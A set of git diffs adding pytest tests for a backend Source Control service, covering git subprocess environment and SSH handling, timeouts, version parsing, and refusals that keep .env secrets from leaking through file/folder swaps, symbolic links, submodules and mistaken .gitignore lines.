+    A server started from a shell inside a git hook inherits ``GIT_DIR``,
+    and every ``-C <project>`` in this module would then be ignored.
+    """
+    monkeypatch.setenv(name, "C:/somewhere/else/.git")
+
+    assert name not in runner.git_env()
+
+
+@pytest.mark.parametrize("name", ["PYTHONPATH", "PYTHONHOME"])
+def test_env_drops_the_python_pointers(monkeypatch, fake_git, name):
+    """Inherited from ``pip_env`` -- pinned here because it is a promise the
+    git side relies on: a hook written in Python must not be run against
+    this server's interpreter or this repository's ``app`` package."""
+    monkeypatch.setenv(name, "D:/Github/CodefyUI/backend")
+
+    assert name not in runner.git_env()
+
+
+def test_env_keeps_the_users_own_ssh_command(monkeypatch):
+    """A ``GIT_SSH_COMMAND`` the user set wins, and is not even second-guessed.
+
+    Theirs may name a key, a jump host or a Windows OpenSSH binary. Ours
+    knows none of that, so when the environment already answers the
+    question the probe must not run at all.
+    """
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.setenv("GIT_SSH_COMMAND", "ssh -i C:/keys/id_ed25519")
+    probes: list[int] = []
+    monkeypatch.setattr(runner, "_ssh_command_configured",
+                        lambda: probes.append(1) or False)
+
+    assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -i C:/keys/id_ed25519"
+    assert probes == []
+
+
+def test_env_adds_batch_mode_when_nothing_is_configured(monkeypatch):
+    """No env var and no ``core.sshCommand``: ssh must fail fast, not ask.
+
+    Without batch mode, ssh prompts for a passphrase or a host-key
+    confirmation on a server that has no terminal to answer it.
+    """
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    # ``git config --get`` exits 1 for "unset", which is an ok_code here.
+    _fake_popen(monkeypatch, _FakeProc(returncode=1))
+
+    assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+
+
+def test_env_leaves_ssh_alone_when_core_sshcommand_is_set(monkeypatch):
+    """A user who configured ssh in git config gets their configuration."""
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    _fake_popen(monkeypatch, _FakeProc(stdout=b"ssh -i C:/keys/id_ed25519\n"))
+
+    assert "GIT_SSH_COMMAND" not in runner.git_env()
+
+
+def test_ssh_probe_runs_once_per_process(monkeypatch):
+    """The answer cannot change often enough to be worth a process a poll."""
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    calls: list[list[str]] = []
+
+    def _popen(argv, **kwargs):
+        calls.append(argv)
+        return _FakeProc(returncode=1)
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    runner.git_env()
+    runner.git_env()
+
+    assert len(calls) == 1
+    assert calls[0][-3:] == ["config", "--get", "core.sshCommand"]
+
+
+def test_ssh_probe_failure_is_not_fatal(monkeypatch):
+    """A config the probe cannot read must not break every git command."""
+    monkeypatch.setattr(runner, "git_executable", lambda: None)
+
+    assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+
+
+def test_read_only_skips_the_index_lock(monkeypatch, fake_git):
+    """A status poll must not fight a real operation for the index lock."""
+    assert "GIT_OPTIONAL_LOCKS" not in runner.git_env()
+    assert runner.git_env(read_only=True)["GIT_OPTIONAL_LOCKS"] == "0"
+
+
+def test_read_only_reaches_the_process(monkeypatch, fake_git):
+    """...and the flag the caller passed to ``run_git`` is the one used."""
+    _, seen = _run(monkeypatch, _FakeProc(), read_only=True)
+
+    assert seen["kwargs"]["env"]["GIT_OPTIONAL_LOCKS"] == "0"
+
+
+# --- the platform ----------------------------------------------------------
+
+
+def test_windows_creationflags(monkeypatch, fake_git):
+    """No console window over the editor, and a killable process GROUP."""
+    monkeypatch.setattr(sys, "platform", "win32")
+
+    _, seen = _run(monkeypatch, _FakeProc())
+
+    flags = seen["kwargs"]["creationflags"]
+    assert flags & packs_runner.CREATE_NO_WINDOW
+    assert flags & packs_runner.CREATE_NEW_PROCESS_GROUP
+
+
+def test_posix_creationflags_are_zero(monkeypatch, fake_git):
+    """The Windows-only constants must not leak into a POSIX call."""
+    monkeypatch.setattr(sys, "platform", "linux")
+
+    _, seen = _run(monkeypatch, _FakeProc())
+
+    assert seen["kwargs"]["creationflags"] == 0
+
+
+# --- failures --------------------------------------------------------------
+
+
+def test_timeout_kills_the_tree_and_reports_504(monkeypatch, fake_git):
+    """A hung git is killed with its children, and says so as a 504.
+
+    Killing the TREE matters: what hangs is usually the ssh or curl git
+    started, and it holds the index lock the next request needs.
+    """
+    proc = _FakeProc(hangs=True)
+    stopped: list = []
+    monkeypatch.setattr(runner, "stop_process", stopped.append)
+    _fake_popen(monkeypatch, proc)
+
+    with pytest.raises(GitError) as excinfo:
+        runner.run_git(["status"], cwd=Path.cwd(), timeout=10)
+
+    assert excinfo.value.code == "timeout"
+    assert excinfo.value.status == 504
+    assert stopped == [proc]
+    # The pipes are collected afterwards, so no zombie and no warning.
+    assert len(proc.communicate_calls) == 2
+
+
+def test_missing_git_never_spawns(monkeypatch):
+    """``git_missing`` is decided before a process is started."""
+    monkeypatch.setattr(runner, "git_executable", lambda: None)
+
+    def _popen(argv, **kwargs):
+        raise AssertionError("a process was started without a git")
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    with pytest.raises(GitError) as excinfo:
+        runner.run_git(["status"], cwd=Path.cwd(), timeout=10)
+
+    assert excinfo.value.code == "git_missing"
+    assert excinfo.value.status == 503
+    assert excinfo.value.hint
+
+
+def test_git_that_vanished_is_git_missing(monkeypatch, fake_git):
+    """git was on PATH when we looked and is not there now (an uninstall,
+    a PATH edit): a reportable outcome, not a traceback."""
+    def _popen(argv, **kwargs):
+        raise FileNotFoundError(2, "No such file or directory", _GIT)
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    with pytest.raises(GitError) as excinfo:
+        runner.run_git(["status"], cwd=Path.cwd(), timeout=10)
+
+    assert excinfo.value.code == "git_missing"
+
+
+def test_git_that_cannot_be_executed_is_structured(monkeypatch, fake_git):
+    """A permission bit on the executable is a 500 with a reason, not an
+    ``OSError`` escaping into the response."""
+    def _popen(argv, **kwargs):
+        raise PermissionError(13, "Permission denied", _GIT)
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    with pytest.raises(GitError) as excinfo:
+        runner.run_git(["status"], cwd=Path.cwd(), timeout=10)
+
+    assert excinfo.value.code == "git_failed"
+    assert excinfo.value.status == 500
+
+
+def test_unexpected_return_code_is_classified(monkeypatch, fake_git):
+    """A failing command comes back with a code the frontend can translate."""
+    proc = _FakeProc(returncode=128,
+                     stderr=b"fatal: Authentication failed for 'https://x/y'\n")
+    _fake_popen(monkeypatch, proc)
+
+    with pytest.raises(GitError) as excinfo:
+        runner.run_git(["push"], cwd=Path.cwd(), timeout=10)
+
+    assert excinfo.value.code == "auth_required"
+
+
+def test_ok_codes_are_not_failures(monkeypatch, fake_git):
+    """``diff`` exits 1 to mean "there are differences"; only the caller
+    knows that, so only the caller can say so."""
+    proc = _FakeProc(returncode=1, stdout=b"@@ -1 +1 @@\n")
+
+    result, _ = _run(monkeypatch, proc, ("diff",), ok_codes=(0, 1))
+
+    assert result.returncode == 1
+    assert result.out.startswith("@@")
+
+
+# --- what comes back -------------------------------------------------------
+
+
+def test_crlf_survives_the_round_trip(monkeypatch, fake_git):
+    """A diff of a CRLF file describes CRLF lines. Text mode would eat them."""
+    proc = _FakeProc(stdout=b"+first\r\n+second\r\n")
+
+    result, _ = _run(monkeypatch, proc)
+
+    assert result.stdout == b"+first\r\n+second\r\n"
+    assert result.out == "+first\r\n+second\r\n"
+
+
+def test_undecodable_bytes_are_replaced_not_raised(monkeypatch, fake_git):
+    """A latin-1 filename in a repository is not a 500."""
+    proc = _FakeProc(stdout=b"caf\xe9.txt", stderr=b"\xff")
+
+    result, _ = _run(monkeypatch, proc)
+
+    assert result.out == "caf\ufffd.txt"
+    assert result.err == "\ufffd"
+
+
+def test_result_keeps_the_argv_it_ran(monkeypatch, fake_git, tmp_path):
+    """What ran is part of the result -- a log line nobody has to reconstruct."""
+    result, seen = _run(monkeypatch, _FakeProc(), cwd=tmp_path)
+
+    assert result.argv == seen["argv"]
+
+
+# --- discovering git -------------------------------------------------------
+
+
+def test_git_executable_is_found_once(monkeypatch):
+    """git does not move; PATH is scanned once per process."""
+    calls: list[str] = []
+    monkeypatch.setattr(runner, "shutil",
+                        types.SimpleNamespace(
+                            which=lambda name: calls.append(name) or _GIT))
+
+    assert runner.git_executable() == _GIT
+    assert runner.git_executable() == _GIT
+    assert calls == ["git"]
+
+
+def test_a_missing_git_is_rechecked_after_thirty_seconds(monkeypatch):
+    """A machine without git must not scan PATH on every status poll -- and
+    must still notice an install without a server restart."""
+    clock = [1000.0]
+    found: list[str | None] = [None]
+    calls: list[str] = []
+    # Patched on the runner's own references, not on the modules: a fake
+    # clock installed globally would be inherited by pytest itself.
+    monkeypatch.setattr(runner, "time",
+                        types.SimpleNamespace(monotonic=lambda: clock[0]))
+    monkeypatch.setattr(runner, "shutil",
+                        types.SimpleNamespace(
+                            which=lambda name: calls.append(name) or found[0]))
+
+    assert runner.git_executable() is None
+    clock[0] += runner.MISSING_RECHECK_S - 1
+    assert runner.git_executable() is None
+    assert calls == ["git"], "PATH was scanned again inside the window"
+
+    clock[0] += 2
+    found[0] = _GIT
+    assert runner.git_executable() == _GIT
+    assert len(calls) == 2
+
+
+def test_git_version_ignores_the_vendor_suffix(monkeypatch, fake_git):
+    """``git version 2.53.0.windows.2`` is 2.53.0: the vendor's own counter
+    is not comparable with anyone else's."""
+    _fake_popen(monkeypatch, _FakeProc(stdout=b"git version 2.53.0.windows.2\n"))
+
+    assert runner.git_version() == (2, 53, 0)
+
+
+def test_git_version_defaults_a_missing_patch(monkeypatch, fake_git):
+    """Some builds report two components only."""
+    _fake_popen(monkeypatch, _FakeProc(stdout=b"git version 2.39\n"))
+
+    assert runner.git_version() == (2, 39, 0)
+
+
+def test_git_version_is_read_once(monkeypatch, fake_git):
+    """The answer cannot change while the process runs."""
+    calls: list[list[str]] = []
+
+    def _popen(argv, **kwargs):
+        calls.append(argv)
+        return _FakeProc(stdout=b"git version 2.53.0\n")
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    assert runner.git_version() == (2, 53, 0)
+    assert runner.git_version() == (2, 53, 0)
+    assert len(calls) == 1
+    assert calls[0][-1] == "--version"
+
+
+def test_git_version_without_git_is_none(monkeypatch):
+    """No git, no version -- and no traceback out of a status read."""
+    monkeypatch.setattr(runner, "git_executable", lambda: None)
+
+    assert runner.git_version() is None
+
+
+def test_git_version_survives_unreadable_output(monkeypatch, fake_git):
+    """Something on PATH called ``git`` that is not git."""
+    _fake_popen(monkeypatch, _FakeProc(stdout=b"this is not git\n"))
+
+    assert runner.git_version() is None

--- a/backend/tests/test_git_runner.py
+++ b/backend/tests/test_git_runner.py
@@ -22,6 +22,7 @@ from __future__ import annotations
 
 import subprocess
 import sys
+import tempfile
 import types
 from pathlib import Path
 
@@ -289,6 +290,59 @@ def test_ssh_probe_failure_is_not_fatal(monkeypatch):
     monkeypatch.setattr(runner, "git_executable", lambda: None)
 
     assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+
+
+def test_the_probe_never_asks_the_servers_own_repository(monkeypatch, tmp_path):
+    """The probe runs from the temp directory, not from ``Path.cwd()``.
+
+    The server's working directory is its own checkout -- a repository with
+    its own config, and one the Source Control tab must never consult. A
+    ``core.sshCommand`` set THERE would otherwise decide how the user's
+    project reaches its remotes.
+    """
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    # A repository, standing in for the checkout the server runs from.
+    (tmp_path / ".git").mkdir()
+    monkeypatch.chdir(tmp_path)
+    seen = _fake_popen(monkeypatch, _FakeProc(returncode=1))
+
+    runner.git_env()
+
+    assert seen["argv"][1:3] == [
+        "-C", str(Path(tempfile.gettempdir()).resolve())]
+    assert str(tmp_path) not in seen["argv"]
+
+
+def test_a_probe_that_failed_is_not_repeated_on_every_command(monkeypatch):
+    """A host whose config cannot be read pays one probe per interval.
+
+    ``git_env`` is called once per git command and the tab polls the status
+    endpoint while it is open, so a probe that is retried on failure is a
+    whole process per request, forever. The failure is remembered exactly as
+    long as a missing binary is.
+    """
+    clock = [1000.0]
+    calls: list[list[str]] = []
+    monkeypatch.setattr(runner, "git_executable", lambda: _GIT)
+    monkeypatch.delenv("GIT_SSH_COMMAND", raising=False)
+    monkeypatch.setattr(runner, "time",
+                        types.SimpleNamespace(monotonic=lambda: clock[0]))
+
+    def _popen(argv, **kwargs):
+        calls.append(argv)
+        # git is there and answering; reading the config is what fails.
+        return _FakeProc(returncode=128, stderr=b"fatal: bad config line 1\n")
+
+    monkeypatch.setattr(subprocess, "Popen", _popen)
+
+    for _ in range(4):
+        assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+    assert len(calls) == 1, "a broken host paid a process per command"
+
+    clock[0] += runner.MISSING_RECHECK_S + 1
+    assert runner.git_env()["GIT_SSH_COMMAND"] == "ssh -oBatchMode=yes"
+    assert len(calls) == 2, "the failure was never rechecked"
 
 
 def test_a_probe_that_could_not_run_is_not_remembered(monkeypatch):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1608,6 +1608,24 @@ async def test_a_conflicted_file_read_from_the_index_is_a_409(repo):
     assert _error(excinfo).status == 409
 
 
+async def test_a_commit_during_a_conflict_is_a_409_and_not_a_500(repo):
+    """The commit button is the most ordinary click there is in this state.
+
+    git refuses it in words no other row knows: "error: Committing is not
+    possible because you have unmerged files." and "fatal: Exiting because
+    of an unresolved conflict." (measured on 2.53, exit 128, on stderr).
+    Neither shares a phrase with the merge-time conflict lines, so this used
+    to be a 500 -- and 500 is the one answer the tab cannot act on.
+    """
+    _conflicted(repo)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.commit("commit while a.txt is unmerged")
+
+    assert _error(excinfo).code == "conflict"
+    assert _error(excinfo).status == 409
+
+
 async def test_a_conflicted_diff_with_blobs_says_why_it_cannot(repo):
     """The documented choice: ``blobs=True`` on a conflicted file is the
     same 409, not a patch with two empty sides. A side-by-side view has no

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -22,6 +22,7 @@ directory as an injected callable.
 from __future__ import annotations
 
 import asyncio
+import os
 import shutil
 import subprocess
 import threading
@@ -1138,6 +1139,215 @@ async def test_staging_a_star_is_not_staging_everything(repo):
 
     assert _error(excinfo).code == "not_found"
     assert (await repo.service.status()).status.staged == []
+
+
+# --- one name, two trees: a file on one side and a folder on the other ------
+
+
+def _swap_to_a_folder(repo: Repo) -> str:
+    """Commit a FILE called ``sub``, then replace it with a folder of secrets.
+
+    The shape that defeats a one-sided check: at the second commit ``sub`` is
+    a tree, at the first it is a blob, and a diff of the pathspec ``sub``
+    prints everything that arrived under it.
+    """
+    repo.commit("sub is a file", {"sub": "just a file\n"})
+    (repo.root / "sub").unlink()
+    repo.commit("sub is a folder", {"sub/.env": f"{SECRET}\n",
+                                    "sub/keep.txt": "keep\n"})
+    return repo.head()
+
+
+def _swap_to_a_file(repo: Repo) -> str:
+    """The reverse: a folder of secrets, then a plain file with its name."""
+    repo.commit("sub is a folder", {"sub/.env": f"{SECRET}\n",
+                                    "sub/keep.txt": "keep\n"})
+    shutil.rmtree(repo.root / "sub")
+    repo.commit("sub is a file", {"sub": "just a file\n"})
+    return repo.head()
+
+
+@pytest.mark.parametrize("blobs", [False, True])
+@pytest.mark.parametrize("build", [_swap_to_a_folder, _swap_to_a_file],
+                         ids=["file-became-a-folder", "folder-became-a-file"])
+async def test_a_commit_that_swaps_a_file_for_a_folder_is_refused(
+        repo, build, blobs):
+    """A blob on one side and a tree on the other is still a tree.
+
+    Answering "one side is a blob, fine" printed the removal (or the
+    arrival) of every file under the folder -- ``sub/.env`` included -- from
+    a route that needs no token. With ``blobs=True`` it was worse: a 500,
+    because ``cat-file blob <tree>`` is not a phrase the missing-object list
+    knows.
+    """
+    sha = build(repo)
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", "commit", sha=sha, blobs=blobs)
+
+    assert _error(excinfo).code == "invalid_path"
+    assert _error(excinfo).status == 400
+    assert "one file" in (_error(excinfo).hint or "")
+
+
+async def test_a_file_staged_over_a_folder_is_refused(repo):
+    """A path can be a file in the INDEX and a folder in HEAD.
+
+    ``diff --cached -- sub`` then prints the removal of everything that used
+    to be under it. The status short-circuit used to accept this: ``sub`` is
+    a perfectly ordinary staged file, in the index, by that name.
+    """
+    repo.commit("sub is a folder", {"sub/.env": f"{SECRET}\n",
+                                    "sub/keep.txt": "keep\n"})
+    shutil.rmtree(repo.root / "sub")
+    repo.write("sub", "just a file\n")
+    repo.git("add", "-A", "--", ".")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", "index")
+
+    assert _error(excinfo).code == "invalid_path"
+    assert _error(excinfo).status == 400
+
+
+async def test_a_folder_staged_over_a_file_is_refused(repo):
+    """The mirror image, which the index cannot report as a tree at all:
+    ``:0:sub`` is not an object when the index holds ``sub/...`` entries, so
+    the only way to see it is to ask which names the pathspec matches."""
+    repo.commit("sub is a file", {"sub": "just a file\n"})
+    (repo.root / "sub").unlink()
+    repo.write("sub/.env", f"{SECRET}\n")
+    repo.write("sub/keep.txt", "keep\n")
+    repo.git("add", "-A", "--", ".")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", "index")
+
+    assert _error(excinfo).code == "invalid_path"
+    assert _error(excinfo).status == 400
+
+
+@pytest.mark.parametrize("scope", ["worktree", "index", "commit"])
+async def test_no_swap_shape_returns_the_secret_in_any_scope(repo, scope):
+    """The catch-all: whatever the answer is, it does not contain the key."""
+    sha = _swap_to_a_folder(repo)
+
+    try:
+        response = await repo.service.diff(
+            "sub", scope, sha=sha if scope == "commit" else None, blobs=True)
+    except GitError as exc:
+        assert exc.code in ("invalid_path", "not_found", "ignored")
+        return
+
+    assert SECRET not in response.patch
+    assert SECRET not in (response.old_text or "")
+    assert SECRET not in (response.new_text or "")
+
+
+async def test_a_deleted_file_still_diffs(repo):
+    """The case the tree check must NOT catch: absent on one side, a blob on
+    the other, which is every deletion in the history."""
+    repo.commit("add it", {"gone.txt": "here\n"})
+    (repo.root / "gone.txt").unlink()
+    sha = repo.commit("delete it")
+
+    response = await repo.service.diff("gone.txt", "commit", sha=sha,
+                                       blobs=True)
+
+    assert "-here" in response.patch
+    assert response.new_missing is True
+    assert response.old_text == "here\n"
+
+
+async def test_reading_a_folder_at_a_ref_is_a_400_not_a_500(repo):
+    """``cat-file blob HEAD:sub`` answers "bad file" -- the object is there
+    and is not a file, which is the caller's mistake and not a server one."""
+    repo.commit("a folder", {"sub/keep.txt": "keep\n"})
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("sub", "HEAD")
+
+    assert _error(excinfo).code == "invalid_path"
+    assert _error(excinfo).status == 400
+
+
+# --- a link is a path to somewhere else -------------------------------------
+
+
+def _link(target: Path, link: Path) -> None:
+    """Make a symlink, or skip the test on a machine that will not.
+
+    Windows needs Developer Mode or an elevated process to create one; Linux
+    CI always can, so the tests below run there whatever this box says.
+    """
+    try:
+        os.symlink(target, link)
+    except (OSError, NotImplementedError) as exc:
+        pytest.skip(f"this OS would not create a symbolic link: {exc}")
+
+
+async def test_a_worktree_read_never_follows_a_symbolic_link(repo):
+    """The link is the filesystem's own redirection, and every check above
+    it passes: ``notes.txt`` is tracked, is not ignored, and is a perfectly
+    ordinary name -- while ``.gitignore`` hides what it points AT."""
+    repo.write(".env", f"{SECRET}\n")
+    _link(repo.root / ".env", repo.root / "notes.txt")
+    repo.commit("track the link")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("notes.txt", "worktree")
+
+    assert _error(excinfo).code == "invalid_path"
+    assert "symbolic link" in (_error(excinfo).hint or "")
+
+
+async def test_a_worktree_read_through_a_linked_folder_is_refused(repo):
+    """A link ANYWHERE in the path counts, not only as its last segment."""
+    secrets = repo.root.parent / "outside"
+    secrets.mkdir()
+    (secrets / "keys.txt").write_text(f"{SECRET}\n", encoding="utf-8")
+    _link(secrets, repo.root / "linked")
+    repo.write("keep.txt", "keep\n")
+    repo.commit("a link to a folder")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.file_at_ref("linked/keys.txt", "worktree")
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+async def test_a_diff_that_would_read_a_link_is_refused_too(repo):
+    """``blobs=True`` reads the worktree side through the same function."""
+    repo.write(".env", f"{SECRET}\n")
+    _link(repo.root / ".env", repo.root / "notes.txt")
+    repo.commit("track the link")
+    repo.write("other.txt", "so there is something to diff\n")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("notes.txt", "worktree", blobs=True)
+
+    assert _error(excinfo).code == "invalid_path"
+
+
+async def test_a_link_at_a_ref_is_its_target_path_not_its_target(repo):
+    """Reading a link from the OBJECT database leaks nothing and stays
+    allowed: git stores a symlink as a blob holding the path it points at."""
+    repo.write(".env", f"{SECRET}\n")
+    _link(repo.root / ".env", repo.root / "notes.txt")
+    repo.commit("track the link")
+
+    content = await repo.service.file_at_ref("notes.txt", "HEAD")
+
+    assert SECRET not in content.text
+    assert content.text.endswith(".env")
+
+
+async def test_an_ordinary_file_beside_a_link_still_reads(repo):
+    """The positive control for the link rule."""
+    repo.write("plain.txt", "ordinary\n")
+
+    assert (await repo.service.file_at_ref("plain.txt",
+                                           "worktree")).text == "ordinary\n"
 
 
 async def test_an_unknown_diff_scope_is_refused(repo):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1053,6 +1053,21 @@ async def test_a_worktree_read_of_an_ignored_file_is_refused(repo):
     assert _error(excinfo).status == 403
 
 
+async def test_a_tracked_file_that_matches_an_ignore_rule_is_still_served(repo):
+    """The common case that the ignore check must not break: a file that was
+    committed before the rule existed. ``check-ignore`` consults the index
+    unless it is told not to, so it answers "not ignored" for a tracked path
+    (measured on git 2.53) -- which is why the tracked check does not have to
+    run first."""
+    repo.write("app.log", "kept\n")
+    repo.git("add", "-f", "--", "app.log")
+    repo.commit("track a log file", {".gitignore": "*.log\n"})
+
+    content = await repo.service.file_at_ref("app.log", "worktree")
+
+    assert content.text == "kept\n"
+
+
 async def test_a_worktree_read_of_a_file_git_has_never_heard_of_is_a_404(repo):
     """Not tracked, not in the status: there is nothing to serve."""
     with pytest.raises(GitError) as excinfo:

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1461,6 +1461,33 @@ async def test_a_diff_that_would_read_a_link_is_refused_too(repo):
     assert _error(excinfo).code == "invalid_path"
 
 
+async def test_a_link_that_points_at_itself_is_a_400_and_not_a_crash(repo):
+    """``Path.resolve`` RAISES on a cycle, on the runtime this ships on.
+
+    ``loop_a -> loop_b -> loop_a`` makes Python 3.11 raise
+    ``RuntimeError("Symlink loop")`` rather than give up quietly (3.13 no
+    longer does, which is how a bug like this survives a newer developer
+    machine). Every route that names a path resolves it -- to check
+    containment, or to see whether something redirected -- so unhandled it
+    was an unexpected exception on an open GET, from a link anybody with
+    write access to the project can make.
+    """
+    _link(repo.root / "loop_b", repo.root / "loop_a")
+    _link(repo.root / "loop_a", repo.root / "loop_b")
+    service = repo.service
+
+    with pytest.raises(GitError) as read:
+        await service.file_at_ref("loop_a", "worktree")
+    with pytest.raises(GitError) as patch:
+        await service.diff("loop_a", "worktree")
+    with pytest.raises(GitError) as write:
+        await service.discard(["loop_a"])
+
+    for excinfo in (read, patch, write):
+        assert _error(excinfo).code == "invalid_path"
+        assert _error(excinfo).status == 400
+
+
 async def test_a_link_at_a_ref_is_its_target_path_not_its_target(repo):
     """Reading a link from the OBJECT database leaks nothing and stays
     allowed: git stores a symlink as a blob holding the path it points at."""

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1910,6 +1910,29 @@ async def test_a_submodule_is_refused_in_a_commit_too(repo):
     assert "submodule" in (_error(excinfo).hint or "")
 
 
+async def test_a_real_submodule_is_refused_in_a_commit_too(repo):
+    """The fixture above has an advantage a real submodule does not.
+
+    ``_with_gitlink`` points at a commit THIS repository holds, so
+    ``cat-file -t`` can answer "commit" for it. A real submodule's objects
+    live in the other repository: ``cat-file -t`` exits 128 with "could not
+    get object info" (measured on git 2.53) and the path read as missing --
+    a 404 for the one shape the refusal exists for, while the worktree and
+    index scopes named it. The tree still knows: mode 160000 is in the
+    entry, whether or not the object it points at is here.
+    """
+    repo.git("update-index", "--add", "--cacheinfo",
+             f"160000,{'0' * 39}1,sub")
+    repo.git("commit", "-q", "-m", "a submodule this repository cannot read")
+
+    with pytest.raises(GitError) as excinfo:
+        await repo.service.diff("sub", "commit", sha=repo.head())
+
+    assert _error(excinfo).code == "invalid_path"
+    assert _error(excinfo).status == 400
+    assert "submodule" in (_error(excinfo).hint or "")
+
+
 async def test_an_unknown_diff_scope_is_refused(repo):
     with pytest.raises(GitError) as excinfo:
         await repo.service.diff("a.txt", "everything")

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -405,20 +405,17 @@ async def test_init_leaves_a_gitignore_that_already_hides_env_alone(tmp_path):
 
 @pytest.mark.parametrize("existing", [
     pytest.param("/.env\n", id="anchored-to-the-root"),
-    pytest.param(".env/\n", id="written-as-a-directory"),
     pytest.param(".env   \n", id="trailing-spaces"),
-    pytest.param(".env  # secrets\n", id="trailing-comment"),
-    pytest.param("*.pyc\n/.env/   # keys\n", id="all-of-it-at-once"),
+    pytest.param("*.pyc\n/.env  \n", id="among-other-rules"),
 ])
-async def test_init_reads_the_other_ways_people_write_the_env_line(
+async def test_init_reads_the_other_ways_of_really_ignoring_env(
         tmp_path, existing):
-    """A second ``.env`` under somebody's own reads as a bug in the tab.
+    """A second ``.env`` under a line that already does the job is a bug.
 
-    Two of these spellings do not really ignore a FILE called ``.env`` --
-    git matches ``.env/`` against directories only, and ``#`` opens a
-    comment just in the first column. They still count, because the promise
-    here is not to touch a file whose author has already written about
-    ``.env`` in it.
+    ``/.env`` is the same rule anchored to the repository root, and git
+    drops trailing whitespace before matching -- so both of these keep the
+    file out, and appending beside them would only make the user's own file
+    harder to read.
     """
     root = tmp_path / "fresh"
     root.mkdir()
@@ -428,6 +425,35 @@ async def test_init_reads_the_other_ways_people_write_the_env_line(
 
     assert (root / ".gitignore").read_bytes() == existing.encode("utf-8")
     assert result.detail["scaffold"] == [".gitattributes"]
+
+
+@pytest.mark.parametrize("existing", [
+    pytest.param(".env/\n", id="directory-only-pattern"),
+    pytest.param(".env  # secrets\n", id="what-looks-like-a-comment"),
+    pytest.param("*.pyc\n/.env/   # keys\n", id="both-mistakes-at-once"),
+    # ``!.env`` has its own test below: it is a near-miss for a different
+    # reason, and the reason is what makes it worth naming.
+    pytest.param(".env.example\n", id="a-different-file"),
+])
+async def test_init_appends_when_the_line_only_looks_like_it_ignores_env(
+        tmp_path, existing):
+    """A near-miss is not a rule, and the append is the safe direction.
+
+    ``.env/`` matches a DIRECTORY and never a file; ``.gitignore`` has no
+    trailing comments, so ``.env  # secrets`` is a pattern matching a file
+    with that whole name. Whoever wrote either believes their secrets are
+    ignored and they are not -- and a duplicate line costs nothing, while a
+    missing one is the API keys this scaffold exists to keep out.
+    """
+    root = tmp_path / "fresh"
+    root.mkdir()
+    (root / ".gitignore").write_bytes(existing.encode("utf-8"))
+
+    result = await GitService(project_dir=lambda: root).init()
+
+    assert (root / ".gitignore").read_bytes() == (
+        existing.encode("utf-8") + b"\n.env\n")
+    assert ".gitignore" in result.detail["scaffold"]
 
 
 async def test_init_still_hides_env_next_to_an_un_ignore_rule(tmp_path):

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -430,6 +430,8 @@ async def test_init_reads_the_other_ways_of_really_ignoring_env(
 @pytest.mark.parametrize("existing", [
     pytest.param(".env/\n", id="directory-only-pattern"),
     pytest.param(".env  # secrets\n", id="what-looks-like-a-comment"),
+    pytest.param("  .env\n", id="indented-with-spaces"),
+    pytest.param("\t.env\n", id="indented-with-a-tab"),
     pytest.param("*.pyc\n/.env/   # keys\n", id="both-mistakes-at-once"),
     # ``!.env`` has its own test below: it is a near-miss for a different
     # reason, and the reason is what makes it worth naming.
@@ -441,9 +443,12 @@ async def test_init_appends_when_the_line_only_looks_like_it_ignores_env(
 
     ``.env/`` matches a DIRECTORY and never a file; ``.gitignore`` has no
     trailing comments, so ``.env  # secrets`` is a pattern matching a file
-    with that whole name. Whoever wrote either believes their secrets are
-    ignored and they are not -- and a duplicate line costs nothing, while a
-    missing one is the API keys this scaffold exists to keep out.
+    with that whole name; and git keeps LEADING whitespace, so ``  .env``
+    is a pattern for a file whose name starts with two spaces (measured:
+    ``git check-ignore -v -- .env`` exits 1 against it). Whoever wrote any
+    of them believes their secrets are ignored and they are not -- and a
+    duplicate line costs nothing, while a missing one is the API keys this
+    scaffold exists to keep out.
     """
     root = tmp_path / "fresh"
     root.mkdir()

--- a/backend/tests/test_git_service.py
+++ b/backend/tests/test_git_service.py
@@ -1,0 +1,1303 @@
+"""The Source Control service, against real repositories in ``tmp_path``.
+
+Nothing here fakes git. Every test makes a repository, runs the real thing
+against it and looks at what happened on disk -- because every bug this
+layer can have is a bug about what git actually does, and a mock would
+happily agree with a wrong idea of it. Three of these tests exist because
+git 2.53 did not do what the plan assumed (``-m --first-parent`` does not
